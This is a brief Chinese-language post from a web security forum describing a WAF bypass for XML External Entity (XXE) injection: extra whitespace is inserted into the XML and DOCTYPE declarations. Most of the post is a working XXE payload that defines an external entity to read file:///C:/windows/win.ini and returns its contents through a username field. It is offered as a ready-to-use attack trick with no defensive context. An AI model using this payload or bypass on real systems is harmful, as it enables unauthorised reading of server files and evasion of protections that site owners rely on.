xxe绕过waf-加多个空格-Web安全论坛-网络安全-讯岚社区

xxe绕过waf-加多个空格

白昼小丑徽章-创作者荣誉勋章-讯岚社区等级-LV2-讯岚社区6个月前发布
170

XML格式允许在格式化标记属性时使用任意数量的空格,因此攻击者可以在<?xml?><!DOCTYPE>中插入额外的空格,从而绕过此类WAF.

<?xml

version=”1.0″?>

<!DOCTYPE

test1[

<!ELEMENT

foo ANY>

<!ENTITY test

SYSTEM

“file:///C:/windows/win.ini”>

]>

<user><username>&test;</username><password>admin</password></user>

 

20240527152011599-5dc213c9b107057a37396c61ea3477e8_FugfF0Ma-_p6JE6zmCYmNi-GgkKT

 

1
1人已评分
分享
请登录后发表评论

    没有回复内容

用户封面
白昼小丑的头像-讯岚社区
最新

讯岚社区
领取新人见面礼
嘿,朋友!给你来点见面礼!限时免费领取,数量有限先到先得!
立即点击领取
文章投稿发布帖子
扫码添加微信-讯岚社区
在手机上浏览此页面